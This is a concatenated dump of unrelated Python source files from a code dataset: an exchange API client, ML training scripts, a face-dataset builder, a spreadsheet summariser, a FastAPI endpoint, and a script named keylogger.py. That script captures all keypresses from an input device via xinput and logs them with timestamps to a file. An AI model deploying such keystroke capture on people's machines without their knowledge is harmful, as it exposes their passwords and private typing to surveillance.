options = {}\r\n\r\n if instrument:\r\n options[\"instrument\"] = instrument\r\n if orderId:\r\n options[\"orderId\"] = orderId\r\n\r\n return self.request(\"/api/v1/private/getopenorders\", options)\r\n\r\n def positions(self):\r\n return self.request(\"/api/v1/private/positions\", {})\r\n\r\n def orderhistory(self, count=None):\r\n options = {}\r\n if count:\r\n options[\"count\"] = count\r\n\r\n return self.request(\"/api/v1/private/orderhistory\", options)\r\n\r\n def tradehistory(self, countNum=None, instrument=\"all\", startTradeId=None):\r\n options = {\r\n \"instrument\": instrument\r\n }\r\n\r\n if countNum:\r\n options[\"count\"] = countNum\r\n if startTradeId:\r\n options[\"startTradeId\"] = startTradeId\r\n\r\n return self.request(\"/api/v1/private/tradehistory\", options)\r\n\r\n # Default pulling options table but can be used to pull other data tables as well\r\n def getdatatable(self, start=0, table=\"options\", draw=1, length=10):\r\n options = {\r\n \"start\": start,\r\n \"table\": table,\r\n \"draw\": draw,\r\n \"length\": length\r\n }\r\n return self.request(\"/api/v1/private/datatable\", options)\r\n\r\n\r\n", "sub_path": "deribit_api.py", "file_name": "deribit_api.py", "file_ext": "py", "file_size_in_byte": 6915, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.Session", "line_number": 11, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 68, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 82, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "565298200", "text": "'''\nBy adidinchuk park. adidinchuk@gmail.com.\nhttps://github.com/adidinchuk/tf-support-vector-machines\n'''\n\nimport data as d\nimport numpy as np\nfrom network import Network\nimport hyperparams as hp\n\n# load and parse data\ndata = d.load_data('seeds//seeds_dataset.txt')\ndata = [row[0].replace('\\t\\t', '\\t') for row in data]\ndata = [row.split('\\t') for row in data]\n\n# extract desired features and targets\ninputs = np.array([list(map(float, [row[6], row[4]])) for row in data])\ntargets = np.transpose(np.array([list(map(float, [1 if int(row[7]) == 1 else -1,\n 1 if int(row[7]) == 2 else -1,\n 1 if int(row[7]) == 3 else -1])) for row in data]))\n\n\n# extract desired features and targets\n#inputs = np.array([list(map(float, [row[6], row[4]])) for row in data if int(row[7]) == 3 or int(row[7]) == 2])\n#targets = np.transpose(np.array([list(map(float, [1 if int(row[7]) == 3 else -1,\n# 1 if int(row[7]) == 2 else -1])) for row in data if int(row[7]) == 3 or int(row[7]) == 2]))\n\n\n# extract number of features and number of data clusters from the data\nfeature_count = len(inputs[0])\ncluster_count = len(targets)\n\n# init the network and train\nnet = Network(feature_count, cluster_count, gamma=hp.gamma)\nnet.train(inputs, targets, lr=hp.learning_rate, batch_size=hp.batch_size,\n epochs=hp.epochs, plot=True, kernel='gaussian')\n\n# Example generating predictions for data\ntest_inx = [0, 85, 190, 10, 95, 205]\ntmp = np.transpose(targets)\nprint(tmp[test_inx])\nprint(net.predict(inputs[test_inx]))\n", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 1638, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "data.load_data", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "network.Network", "line_number": 34, "usage_type": "call"}, {"api_name": "hyperparams.gamma", "line_number": 34, "usage_type": "attribute"}, {"api_name": "hyperparams.learning_rate", "line_number": 35, "usage_type": "attribute"}, {"api_name": "hyperparams.batch_size", "line_number": 35, "usage_type": "attribute"}, {"api_name": "hyperparams.epochs", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.transpose", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "637602412", "text": "import os\nimport tqdm\nimport cv2\nimport multiprocessing\nimport torch\nimport math\nimport argparse\nimport numpy as np\nimport utils\nimport shutil\nfrom PIL import Image\n\n\nTARGET_DIR = \"data/fdf_new\"\nshutil.rmtree(TARGET_DIR)\nIMAGE_TARGET_DIR = os.path.join(TARGET_DIR, \"images\")\nos.makedirs(IMAGE_TARGET_DIR)\nBBOX_TARGET_DIR = os.path.join(TARGET_DIR, \"bounding_box\")\nos.makedirs(BBOX_TARGET_DIR)\nLANDMARK_TARGET_DIR = os.path.join(TARGET_DIR, \"landmarks\")\nos.makedirs(LANDMARK_TARGET_DIR)\n\nnp.random.seed(0)\nIMAGE_SOURCE_DIR = \"/work/haakohu/yfcc100m/images2\"\n#LANDMARKS_PATH = \"/lhome/haakohu/flickr_download/annotations_keypoints.json\"\nLANDMARKS_PATH = \"test_keypoints.json\"\n\n#BBOX_PATH = \"/lhome/haakohu/flickr_download/annotations.json\"\nBBOX_PATH = \"test_bbox.json\"\nBBOX_JSON = utils.read_json(BBOX_PATH)\nLANDMARKS_JSON = utils.read_json(LANDMARKS_PATH)\nfdf_metainfo = utils.read_json(\"fdf_metainfo.json\")\n\nMIN_BBOX_SIZE = 128\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--max_imsize\", default=128, type=int)\nparser.add_argument(\"--min_imsize\", default=4, type=int)\nparser.add_argument(\"--simple_expand\", default=False, action=\"store_true\",\n help=\"Expands the face bounding box from the center. Can include black borders.\")\nargs = parser.parse_args()\n\n\nnum_sizes = int(math.log(args.max_imsize/args.min_imsize, 2))\nTARGET_IMSIZES = [args.min_imsize * (2**k) for k in range(1, num_sizes+1)]\n\nfor imsize in TARGET_IMSIZES:\n folder = os.path.join(IMAGE_TARGET_DIR, str(imsize))\n os.makedirs(folder)\n\n\ndef get_imnames():\n imnames1 = set(LANDMARKS_JSON.keys())\n imnames2 = set(BBOX_JSON.keys())\n image_names = list(imnames2.intersection(imnames1))\n image_names.sort()\n\n return image_names\n\n\ndef match_bbox_keypoint(bounding_boxes, keypoints):\n \"\"\"\n bounding_boxes shape: [N, 5]\n keypoints: [N persons, (X, Y, Score, ?), K Keypoints]\n \"\"\"\n if len(bounding_boxes) == 0 or len(keypoints) == 0:\n return None, None\n assert bounding_boxes.shape[1] == 5, \"Shape was : {}\".format(\n bounding_boxes.shape)\n assert keypoints.shape[1:] == (4, 7), \"Keypoint shape was: {}\".format(keypoints.shape)\n # Sort after score\n sorted_idx = np.argsort(bounding_boxes[:, 4])[::-1]\n bounding_boxes = bounding_boxes[sorted_idx]\n\n matches = []\n bounding_boxes = bounding_boxes[:, :4]\n keypoints = keypoints[:, :2]\n for bbox_idx, bbox in enumerate(bounding_boxes):\n keypoint = None\n for kp_idx, keypoint in enumerate(keypoints):\n if kp_idx in [x[1] for x in matches]:\n continue\n if utils.is_keypoint_within_bbox(*bbox, keypoint):\n matches.append((bbox_idx, kp_idx))\n break\n keypoint_idx = [x[1] for x in matches]\n bbox_idx = [x[0] for x in matches]\n return bounding_boxes[bbox_idx], keypoints[keypoint_idx]\n\n\ndef process_face(bbox, landmark, imshape, imname):\n assert bbox.shape == (4,), \"Was shape: {}\".format(bbox.shape)\n assert landmark.shape == (2, 7), \"Was shape: {}\".format(landmark.shape)\n orig_bbox = bbox.copy()\n orig_landmark = landmark.copy()\n expanded_bbox = utils.expand_bbox(bbox, imshape, args.simple_expand)\n if expanded_bbox is None:\n return None\n\n width = expanded_bbox[2] - expanded_bbox[0]\n height = expanded_bbox[3] - expanded_bbox[1]\n if width < MIN_BBOX_SIZE:\n return None\n bbox[[0, 2]] -= expanded_bbox[0]\n bbox[[1, 3]] -= expanded_bbox[1]\n assert width == height, f\"width: {width}, height: {y1-y0}\"\n bbox = bbox.astype(\"int\")\n landmark[0] -= expanded_bbox[0]\n landmark[1] -= expanded_bbox[1]\n landmark = np.array([landmark[j, i]\n for i in range(landmark.shape[1]) for j in range(2)])\n return {\n \"expanded_bbox\": expanded_bbox,\n \"face_bbox\": bbox,\n \"landmark\": landmark.flatten(),\n \"orig_bbox\": orig_bbox,\n \"orig_landmark\": orig_landmark,\n \"line_idx\": imname.split(\".\")[0]\n }\n\n\ndef process_image(imname):\n impath = os.path.join(IMAGE_SOURCE_DIR, imname)\n bounding_boxes = np.array(BBOX_JSON[imname])\n landmarks = np.array(LANDMARKS_JSON[imname][\"cls_keyps\"])\n bounding_boxes, landmarks = match_bbox_keypoint(bounding_boxes, landmarks)\n if bounding_boxes is None:\n return [], impath\n assert bounding_boxes.shape[0] == landmarks.shape[0]\n\n im = Image.open(impath)\n\n imshape = im.size\n imshape = (imshape[1], imshape[0], *imshape[2:])\n resulting_annotation = []\n for bbox, landmark in zip(bounding_boxes, landmarks):\n bbox[0] = max(0, bbox[0])\n bbox[1] = max(0, bbox[1])\n bbox[2] = min(imshape[1], bbox[2])\n bbox[3] = min(imshape[0], bbox[3])\n face_res = process_face(bbox.copy(), landmark, imshape, imname)\n if face_res is not None:\n resulting_annotation.append(face_res)\n return resulting_annotation, impath\n\n\ndef pool(img):\n img = img.astype(np.float32)\n img = (img[0::2, 0::2] + img[0::2, 1::2] +\n img[1::2, 0::2] + img[1::2, 1::2]) * 0.25\n img = img.astype(np.uint8)\n return img\n\n\ndef save_face(original_im, face_annotation, im_idx):\n im = utils.cut_face(original_im, face_annotation[\"expanded_bbox\"],\n args.simple_expand)\n max_imsize = TARGET_IMSIZES[-1]\n im = cv2.resize(im, (max_imsize, max_imsize), interpolation=cv2.INTER_AREA)\n\n for imsize_idx in range(len(TARGET_IMSIZES)-1, -1, -1):\n imsize = TARGET_IMSIZES[imsize_idx]\n assert im.shape == (imsize, imsize, 3)\n assert im.dtype == np.uint8\n impath = os.path.join(IMAGE_TARGET_DIR, str(imsize), f'{im_idx}.jpg')\n to_save = Image.fromarray(im)\n to_save.save(impath)\n im = pool(im)\n\n\ndef extract_and_save_faces(impath, image_annotations, batch_offset):\n original_im = np.array(Image.open(impath).convert(\"RGB\"))\n for face_idx, face_annotation in enumerate(image_annotations):\n save_face(original_im, face_annotation, face_idx + batch_offset)\n\n\ndef save_annotation(bounding_boxes, landmarks, sizes):\n normalized_bbox = bounding_boxes\n normalized_landmark = landmarks\n\n for imsize in TARGET_IMSIZES:\n bbox_to_save = normalized_bbox / sizes * imsize\n bbox_to_save = torch.from_numpy(bbox_to_save).long()\n\n assert bbox_to_save.shape == bounding_boxes.shape\n\n target_path = os.path.join(BBOX_TARGET_DIR, \"{}.torch\".format(imsize))\n torch.save(bbox_to_save, target_path)\n\n landmark_to_save = normalized_landmark / sizes * imsize\n landmark_to_save = torch.from_numpy(landmark_to_save)\n\n target_path = os.path.join(LANDMARK_TARGET_DIR,\n \"{}.torch\".format(imsize))\n torch.save(landmark_to_save, target_path)\n\n\ndef extract_annotations_and_save(image_annotations):\n bounding_boxes = []\n landmarks = []\n sizes = []\n save_metainfo(image_annotations)\n for annotations in tqdm.tqdm(image_annotations, desc=\"Saving annotations\"):\n for annotation in annotations:\n bounding_boxes.append(annotation[\"face_bbox\"])\n landmarks.append(annotation[\"landmark\"])\n x0, y0, x1, y1 = annotation[\"expanded_bbox\"]\n assert int(y1 - y0) == int(x1 - x0), \"Expected image to have equal sizes. Was: {}, {}\".format(x1 - x0, y1 - y0)\n sizes.append(y1 - y0)\n bounding_boxes = np.stack(bounding_boxes, axis=0)\n landmarks = np.stack(landmarks, axis=0)\n sizes = np.array(sizes).reshape(-1, 1)\n save_annotation(bounding_boxes, landmarks, sizes)\n\n\ndef save_metainfo(image_annotations):\n line_idx_to_yfccm_id = {\n item[\"yfcc100m_line_idx\"]: key\n for key, item in fdf_metainfo.items()\n }\n to_save = {\n\n }\n face_id = 0\n total_faces = sum([len(x) for x in image_annotations])\n validation_size = 50000\n start_validation = total_faces - validation_size\n\n for image_annotation in image_annotations:\n for face_annotation in image_annotation:\n line_idx = face_annotation[\"line_idx\"]\n yfcc100m_id = line_idx_to_yfccm_id[line_idx]\n face_metainfo = {\n key: item\n for key, item in fdf_metainfo[yfcc100m_id].items()\n }\n new_landmark = face_annotation[\"landmark\"].reshape(2, -1)\n orig_landmark = face_annotation[\"orig_landmark\"]\n assert new_landmark.shape == orig_landmark.shape, f\"new_landmark: {new_landmark.shape}, orig_landmark: {orig_landmark.shape}\"\n orig_landmark = np.rollaxis(orig_landmark, 1)\n print(orig_landmark.shape)\n face_metainfo[\"original_bounding_box\"] = face_annotation[\"orig_bbox\"].astype(int).tolist()\n face_metainfo[\"original_landmark\"] = orig_landmark.tolist()\n face_metainfo[\"bounding_box\"] = face_annotation[\"face_bbox\"].tolist()\n face_metainfo[\"landmark\"] = face_annotation[\"landmark\"].tolist()\n face_metainfo[\"yfcc100m_line_idx\"] = line_idx\n\n if face_id >= start_validation:\n face_metainfo[\"category\"] = \"validation\"\n else:\n face_metainfo[\"category\"] = \"training\"\n to_save[face_id] = face_metainfo\n face_id += 1\n\n save_path = os.path.join(TARGET_DIR, \"fdf_metainfo.json\")\n utils.write_json(to_save, save_path)\n\n\ndef main():\n image_names = get_imnames()\n impaths = []\n image_annotations = []\n with multiprocessing.Pool(1) as pool:\n jobs = []\n for imname in image_names:\n job = pool.apply_async(process_image, (imname, ))\n jobs.append(job)\n for job in tqdm.tqdm(jobs, desc=\"Pre-processing annotations.\"):\n annotation, impath = job.get()\n impaths.append(impath)\n image_annotations.append(annotation)\n extract_annotations_and_save(image_annotations)\n total_images = [len(x) for x in image_annotations]\n print(\"Total number of images:\", sum(total_images))\n batch_offset = 0\n with multiprocessing.Pool(multiprocessing.cpu_count()) as pool:\n jobs = []\n for im_idx, annotations in enumerate(image_annotations):\n impath = impaths[im_idx]\n job = pool.apply_async(\n extract_and_save_faces, (impath, annotations, batch_offset)\n )\n batch_offset += len(annotations)\n jobs.append(job)\n for job in tqdm.tqdm(jobs):\n job.get()\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "deep_privacy/dataset_tools/fdf/generate_dataset.py", "file_name": "generate_dataset.py", "file_ext": "py", "file_size_in_byte": 10533, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "shutil.rmtree", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 23, "usage_type": "attribute"}, {"api_name": "utils.read_json", "line_number": 30, "usage_type": "call"}, {"api_name": "utils.read_json", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.read_json", "line_number": 32, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 35, "usage_type": "call"}, {"api_name": "math.log", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 71, "usage_type": "call"}, {"api_name": "utils.is_keypoint_within_bbox", "line_number": 82, "usage_type": "call"}, {"api_name": "utils.expand_bbox", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 124, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 130, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 130, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 147, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 150, "usage_type": "attribute"}, {"api_name": "utils.cut_face", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 158, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 163, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 165, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 165, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 171, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 171, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 186, "usage_type": "call"}, {"api_name": "os.path", "line_number": 186, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 192, "usage_type": "call"}, {"api_name": "os.path", "line_number": 192, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 194, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.rollaxis", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 254, "usage_type": "call"}, {"api_name": "os.path", "line_number": 254, "usage_type": "attribute"}, {"api_name": "utils.write_json", "line_number": 255, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 262, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 267, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 275, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 275, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 284, "usage_type": "call"}]} +{"seq_id": "591569268", "text": "from os import listdir\n\nimport openpyxl\nfrom xlsxwriter import Workbook\n\nfrom core.abstract import SeriesSummaryRow, MovieRow\nfrom definitions import CORE_PATH\nfrom util.util import schedule_headers_map, movie_summary_headers, series_summary_headers, series_headers_map, alpha\n\nfrom enrich import imdb as IMDB\nfrom util.util import get_current_date_string\n\n\ndef get_year_from_workbook_name(wb_name):\n return int(\"\".join(x for x in wb_name if x.isdigit()))\n\n\ndef generate_summary_worksheet_from_newest_schedule():\n\n books = [f for f in listdir(CORE_PATH) if 'schedule' in f]\n\n if not books:\n print(\"No schedule files to generate summary\")\n return\n\n books.sort(key=get_year_from_workbook_name, reverse=True)\n\n print(\"Generating summary spreadsheet from : \" + books[0])\n workbook = openpyxl.load_workbook(CORE_PATH + books[0])\n\n schedule_year = get_year_from_workbook_name(books[0])\n wb = Workbook(CORE_PATH + f'movies_series_summary_{schedule_year}_{get_current_date_string()}.xlsx')\n\n movie_rows = []\n series_summary_rows = []\n series_rows = []\n\n movie_sheet = wb.add_worksheet('movies')\n ss_sheet = wb.add_worksheet('series summary')\n s_sheet = wb.add_worksheet('series')\n\n is_headers_row = True\n\n for row in workbook.active.rows:\n if is_headers_row:\n is_headers_row = False\n continue\n\n movie_series_type = row[list(schedule_headers_map).index('type')].value\n title = row[list(schedule_headers_map.keys()).index('title')].value\n\n if movie_series_type == 'film':\n existing_movie_record = list(filter(lambda m: m.title == title, movie_rows))\n\n if not existing_movie_record:\n cast = row[list(schedule_headers_map).index('cast')].value\n mr = IMDB.get_movie_row(title=title, cast=cast)\n\n if mr:\n movie_rows.append(mr)\n else:\n print(\"Existing movie record for title: \" + title)\n\n elif movie_series_type == 'series':\n ep_number = row[list(schedule_headers_map.keys()).index('episode')].value\n season = row[list(schedule_headers_map.keys()).index('season')].value\n series_detail_row = IMDB.get_summary_detail_row(title=title, episode=ep_number, season=season)\n\n if series_detail_row:\n series_rows.append(series_detail_row)\n series_row = list(filter(lambda r: r.title == title and r.season == season, series_summary_rows))\n\n if series_row: # Row with the season and title already exists\n series_row[0].increment_count() # Increment number of episodes for this season\n else:\n print(\"Created new Summary Row for : \" + title)\n sr = SeriesSummaryRow(title=title, type='series', season=season, season_year=series_detail_row.season_year)\n series_summary_rows.append(sr)\n\n series_rows.sort(key=lambda m: m.title)\n movie_rows.sort(key=lambda m: m.title)\n series_summary_rows.sort(key=lambda m: m.title)\n\n for c, h in enumerate(series_headers_map.keys()): # Write headers to series sheet\n s_sheet.write(alpha[c] + str(1), series_headers_map[h])\n\n for row, series_row in enumerate(series_rows):\n for i, field_name in enumerate(series_headers_map.keys()):\n s_sheet.write(alpha[i] + str(row+2), getattr(series_row, field_name))\n\n for c, h in enumerate(vars(SeriesSummaryRow('', '', '')).keys()): # Write headers series summary sheet\n ss_sheet.write(alpha[c] + str(1), series_summary_headers[h])\n\n for row, series_row in enumerate(series_summary_rows):\n for i, field_name in enumerate(vars(series_row).keys()): # Get attribute of SummaryRow object\n ss_sheet.write(alpha[i] + str(row + 2), getattr(series_row, field_name))\n\n for c, h in enumerate(vars(MovieRow()).keys()): # Write headers series summary sheet\n movie_sheet.write(alpha[c] + str(1), movie_summary_headers[h])\n\n for row, movie_row in enumerate(movie_rows):\n for i, field_name in enumerate(vars(movie_row).keys()): # Get attribute of MovieRow object\n movie_sheet.write(alpha[i] + str(row + 2), getattr(movie_row, field_name))\n\n print(\"\\n\\nExecution complete, exiting..\\n\\n\")\n wb.close()\n\n\nif __name__ == '__main__':\n generate_summary_worksheet_from_newest_schedule()\n", "sub_path": "summary.py", "file_name": "summary.py", "file_ext": "py", "file_size_in_byte": 4440, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "definitions.CORE_PATH", "line_number": 20, "usage_type": "argument"}, {"api_name": "openpyxl.load_workbook", "line_number": 29, "usage_type": "call"}, {"api_name": "definitions.CORE_PATH", "line_number": 29, "usage_type": "name"}, {"api_name": "xlsxwriter.Workbook", "line_number": 32, "usage_type": "call"}, {"api_name": "definitions.CORE_PATH", "line_number": 32, "usage_type": "name"}, {"api_name": "util.util.get_current_date_string", "line_number": 32, "usage_type": "call"}, {"api_name": "util.util.schedule_headers_map", "line_number": 49, "usage_type": "argument"}, {"api_name": "util.util.schedule_headers_map.keys", "line_number": 50, "usage_type": "call"}, {"api_name": "util.util.schedule_headers_map", "line_number": 50, "usage_type": "name"}, {"api_name": "util.util.schedule_headers_map", "line_number": 56, "usage_type": "argument"}, {"api_name": "enrich.imdb.get_movie_row", "line_number": 57, "usage_type": "call"}, {"api_name": "enrich.imdb", "line_number": 57, "usage_type": "name"}, {"api_name": "util.util.schedule_headers_map.keys", "line_number": 65, "usage_type": "call"}, {"api_name": "util.util.schedule_headers_map", "line_number": 65, "usage_type": "name"}, {"api_name": "util.util.schedule_headers_map.keys", "line_number": 66, "usage_type": "call"}, {"api_name": "util.util.schedule_headers_map", "line_number": 66, "usage_type": "name"}, {"api_name": "enrich.imdb.get_summary_detail_row", "line_number": 67, "usage_type": "call"}, {"api_name": "enrich.imdb", "line_number": 67, "usage_type": "name"}, {"api_name": "core.abstract.SeriesSummaryRow", "line_number": 77, "usage_type": "call"}, {"api_name": "util.util.series_headers_map.keys", "line_number": 84, "usage_type": "call"}, {"api_name": "util.util.series_headers_map", "line_number": 84, "usage_type": "name"}, {"api_name": "util.util.alpha", "line_number": 85, "usage_type": "name"}, {"api_name": "util.util.series_headers_map", "line_number": 85, "usage_type": "name"}, {"api_name": "util.util.series_headers_map.keys", "line_number": 88, "usage_type": "call"}, {"api_name": "util.util.series_headers_map", "line_number": 88, "usage_type": "name"}, {"api_name": "util.util.alpha", "line_number": 89, "usage_type": "name"}, {"api_name": "core.abstract.SeriesSummaryRow", "line_number": 91, "usage_type": "call"}, {"api_name": "util.util.alpha", "line_number": 92, "usage_type": "name"}, {"api_name": "util.util.series_summary_headers", "line_number": 92, "usage_type": "name"}, {"api_name": "util.util.alpha", "line_number": 96, "usage_type": "name"}, {"api_name": "core.abstract.MovieRow", "line_number": 98, "usage_type": "call"}, {"api_name": "util.util.alpha", "line_number": 99, "usage_type": "name"}, {"api_name": "util.util.movie_summary_headers", "line_number": 99, "usage_type": "name"}, {"api_name": "util.util.alpha", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "369614866", "text": "import time\nimport argparse\nfrom subprocess import Popen, PIPE\n\nparser = argparse.ArgumentParser(description=\"Record Keypresses. Ctrl+q to stop recording\")\nparser.add_argument(\"inputid\", type=int, help=\"input device id (xinput list)\")\nparser.add_argument(\"output\", type=str, help=\"output file\")\nargs = parser.parse_args()\n\nkeycodes = {}\np = Popen([\"xmodmap\", \"-pke\"], stdout=PIPE)\nfor line in p.stdout:\n words = str(line).split()\n key = words[1]\n value = words[3] if len(words) > 3 else \"\"\n keycodes[key] = value\n\nisLeftControlDown = False\nisRightControlDown = False\nf = open(args.output, \"w\")\nstart = time.time()\np = Popen([\"xinput\", \"test\", str(args.inputid)], stdout=PIPE)\nfor line in p.stdout:\n words = str(line).split()\n goingdown = words[1] == \"press\"\n key = keycodes.get(words[2])\n if key == \"Control_L\":\n isLeftControlDown = goingdown\n if key == \"Control_R\":\n isRightControlDown = goingdown\n if key == \"q\" and (isLeftControlDown or isRightControlDown):\n break\n s = []\n s.append(str(time.time() - start))\n s.append(\"keydown\" if goingdown else \"keyup\")\n s.append(key)\n f.write(\" \".join(s))\n f.write(\"\\n\")\n", "sub_path": "keylogger.py", "file_name": "keylogger.py", "file_ext": "py", "file_size_in_byte": 1180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 5, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 11, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 11, "usage_type": "name"}, {"api_name": "time.time", "line_number": 21, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 22, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 22, "usage_type": "name"}, {"api_name": "time.time", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "225940442", "text": "from fastapi import APIRouter\nimport pandas as pd\nimport json\nimport csv\nimport io\nimport requests\n\nrouter = APIRouter()\n\n\n# /final-data endpoint\n@router.get(\"/final-data\")\nasync def final_data():\n # output = sites_ids.to_json(orient=\"records\")\n # parsed = json.loads(output)\n # return parsed\n \"\"\"\n Desired Format\n{\n project_code: 1014107,\n district: \"whatever\",\n province: \"province\",\n sector: \"sector\",\n cell: \"cell\",\n village: \"village\",\n village_id: 342343,\n name: \"Buzi\",\n type: \"Suspended\",\n stage: \"Rejected\",\n sub_stage: \"Technical\",\n individuals_directly_served: 0.0,\n span: \"\",\n lat: -2.42056,\n long: 28.9662,\n communities_served: [\n \"Agahehe\",\n \"Kabacuzi\",\n \"Kamutozo\",\n \"Kamweko\",\n ],\n};\n \"\"\"\n\n # Loading data from URL\n request = requests.get(\n \"https://raw.githubusercontent.com/Lambda-School-Labs/Labs25-Bridges_to_Prosperity-TeamB-ds/main/data/edit/B2P_Rwanda_Sites%2BIDs_full_2020-09-21.csv\"\n )\n buff = io.StringIO(request.text)\n directread = csv.DictReader(buff)\n\n output = {}\n\n # Loop over rows and return according to desired format\n for row in directread:\n\n # splitting \"communities_served\" into list of strings with every\n # iteration\n if len(row[\"communities_served\"]) == 0:\n communities_served = [\"unavailable\"]\n else:\n communities_served = list(row[\"communities_served\"].split(\", \"))\n\n # Set key for dictionary\n key = row[\"project_code\"]\n\n # Set output format\n output[key] = {\n \"project_code\": row[\"project_code\"],\n \"province\": row[\"province\"],\n \"district\": row[\"district\"],\n \"sector\": row[\"sector\"],\n \"cell\": row[\"cell\"],\n \"village\": row[\"village\"],\n \"village_id\": row[\"village_id\"],\n \"name\": row[\"name\"],\n \"type\": row[\"type\"],\n \"stage\": row[\"stage\"],\n \"sub_stage\": row[\"sub_stage\"],\n \"Individuals_directly_served\": int(row[\"Individuals_directly_served\"]),\n \"span\": int(row[\"span\"]),\n \"lat\": float(row[\"lat\"]),\n \"long\": float(row[\"long\"]),\n \"communities_served\": communities_served,\n }\n\n # Return output\n return output\n", "sub_path": "project/app/api/final_data.py", "file_name": "final_data.py", "file_ext": "py", "file_size_in_byte": 2297, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "fastapi.APIRouter", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 45, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 48, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "213330651", "text": "import numpy as np\nimport scipy.special\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nrc = {'lines.linewidth' : 2, 'axes.labelsize' : 18, 'axes.titlesize' : 18}\nsns.set(rc=rc)\n\ndef ecdf(data):\n \"\"\"\n Coputer x, y values for an empirical distribution function\n \"\"\"\n\n x = np.sort(data)\n y = np.arange(1, 1+len(x)) / len(x)\n\n return x, y\n\n#Load data\nxa_high = 